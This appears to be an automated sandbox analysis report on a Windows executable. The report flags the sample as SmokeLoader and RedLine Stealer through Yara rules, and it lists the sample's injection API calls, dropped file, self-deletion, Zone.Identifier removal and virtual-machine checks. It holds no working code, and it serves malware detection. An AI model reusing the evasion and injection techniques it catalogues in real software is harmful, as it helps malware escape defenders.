Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1719274631.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1719274631.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000001.00000000.1723311543.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1719274631.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000001.00000000.1723311543.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000001.00000000.1723311543.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1723311543.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1723311543.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1719274631.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1719274631.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.1729177326.0000000002631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1973355708.00000000043B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1729125452.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1973179203.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1729177326.0000000002631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1729366012.000000000285D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1729108326.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.1973355708.00000000043B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1729125452.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.1972746903.0000000002710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.1973179203.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.1972868127.000000000273D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Code function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,LoadLibraryA,NtMapViewOfSection,	0_2_00401514
Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Code function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	0_2_00402F97
Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Code function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,LoadLibraryA,NtMapViewOfSection,	0_2_00401542
Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Code function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,	0_2_00403247
Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Code function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,LoadLibraryA,NtMapViewOfSection,	0_2_00401549
Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Code function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,	0_2_0040324F
Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Code function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,	0_2_00403256
Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Code function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,LoadLibraryA,NtMapViewOfSection,	0_2_00401557
Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Code function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,	0_2_0040326C
Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Code function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,	0_2_00403277
Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Code function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,LoadLibraryA,NtMapViewOfSection,	0_2_004014FE
Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Code function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,	0_2_00403290
Source: C:\Users\user\AppData\Roaming\sfjujsr	Code function: 4_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,LoadLibraryA,NtMapViewOfSection,	4_2_00401514
Source: C:\Users\user\AppData\Roaming\sfjujsr	Code function: 4_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	4_2_00402F97
Source: C:\Users\user\AppData\Roaming\sfjujsr	Code function: 4_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,LoadLibraryA,NtMapViewOfSection,	4_2_00401542
Source: C:\Users\user\AppData\Roaming\sfjujsr	Code function: 4_2_00403247 NtTerminateProcess,GetModuleHandleA,	4_2_00403247
Source: C:\Users\user\AppData\Roaming\sfjujsr	Code function: 4_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,LoadLibraryA,NtMapViewOfSection,	4_2_00401549
Source: C:\Users\user\AppData\Roaming\sfjujsr	Code function: 4_2_0040324F NtTerminateProcess,GetModuleHandleA,	4_2_0040324F
Source: C:\Users\user\AppData\Roaming\sfjujsr	Code function: 4_2_00403256 NtTerminateProcess,GetModuleHandleA,	4_2_00403256
Source: C:\Users\user\AppData\Roaming\sfjujsr	Code function: 4_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,LoadLibraryA,NtMapViewOfSection,	4_2_00401557
Source: C:\Users\user\AppData\Roaming\sfjujsr	Code function: 4_2_0040326C NtTerminateProcess,GetModuleHandleA,	4_2_0040326C
Source: C:\Users\user\AppData\Roaming\sfjujsr	Code function: 4_2_00403277 NtTerminateProcess,GetModuleHandleA,	4_2_00403277
Source: C:\Users\user\AppData\Roaming\sfjujsr	Code function: 4_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,LoadLibraryA,NtMapViewOfSection,	4_2_004014FE
Source: C:\Users\user\AppData\Roaming\sfjujsr	Code function: 4_2_00403290 NtTerminateProcess,GetModuleHandleA,	4_2_00403290

Source: k8JAXb3Lhs.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.1729177326.0000000002631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1729366012.000000000285D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1729108326.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.1973355708.00000000043B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1729125452.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.1972746903.0000000002710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.1973179203.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.1972868127.000000000273D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: classification engine

Classification label: mal100.troj.evad.winEXE@3/2@6/2

Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe

Code function: 0_2_0286F737 CreateToolhelp32Snapshot,Module32First,

0_2_0286F737

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\sfjujsr

Jump to behavior

Source: k8JAXb3Lhs.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\k8JAXb3Lhs.exe "C:\Users\user\Desktop\k8JAXb3Lhs.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\sfjujsr C:\Users\user\AppData\Roaming\sfjujsr
Source: unknown	Process created: C:\Users\user\AppData\Roaming\sfjujsr C:\Users\user\AppData\Roaming\sfjujsr

Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfjujsr	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfjujsr	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfjujsr	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfjujsr	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfjujsr	Section loaded: winhttp.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: k8JAXb3Lhs.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Unpacked PE file: 0.2.k8JAXb3Lhs.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\sfjujsr	Unpacked PE file: 4.2.sfjujsr.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;

Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Code function: 0_2_004014D9 pushad ; ret	0_2_004014E9
Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Code function: 0_2_004031DB push eax; ret	0_2_004032AB
Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Code function: 0_2_025F1540 pushad ; ret	0_2_025F1550
Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Code function: 0_2_02873190 push esp; ret	0_2_02873192
Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Code function: 0_2_02871533 push B63524ADh; retn 001Fh	0_2_0287156A
Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Code function: 0_2_02872030 pushfd ; iretd	0_2_02872031
Source: C:\Users\user\AppData\Roaming\sfjujsr	Code function: 4_2_004014D9 pushad ; ret	4_2_004014E9
Source: C:\Users\user\AppData\Roaming\sfjujsr	Code function: 4_2_004031DB push eax; ret	4_2_004032AB
Source: C:\Users\user\AppData\Roaming\sfjujsr	Code function: 4_2_02711540 pushad ; ret	4_2_02711550
Source: C:\Users\user\AppData\Roaming\sfjujsr	Code function: 4_2_02752B30 push esp; ret	4_2_02752B32
Source: C:\Users\user\AppData\Roaming\sfjujsr	Code function: 4_2_027519D0 pushfd ; iretd	4_2_027519D1
Source: C:\Users\user\AppData\Roaming\sfjujsr	Code function: 4_2_02750ED3 push B63524ADh; retn 001Fh	4_2_02750F0A

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\sfjujsr

Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\sfjujsr

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\k8jaxb3lhs.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\sfjujsr:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\explorer.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfjujsr	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfjujsr	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfjujsr	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfjujsr	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfjujsr	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfjujsr	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Roaming\sfjujsr	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Roaming\sfjujsr	API/Special instruction interceptor: Address: 7FFE2220D584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: k8JAXb3Lhs.exe, 00000000.00000002.1729313143.000000000284E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ASWHOOK

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 514	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2296	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 892	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2518	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 890	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 863	Jump to behavior

Source: C:\Windows\explorer.exe TID: 2640	Thread sleep count: 514 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2056	Thread sleep count: 2296 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2056	Thread sleep time: -229600s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3736	Thread sleep count: 892 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3736	Thread sleep time: -89200s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5228	Thread sleep count: 320 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4916	Thread sleep count: 334 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4916	Thread sleep time: -33400s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1880	Thread sleep count: 349 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1880	Thread sleep time: -34900s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2056	Thread sleep count: 2518 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2056	Thread sleep time: -251800s >= -30000s	Jump to behavior

Source: explorer.exe, 00000001.00000000.1721545742.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1720881139.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
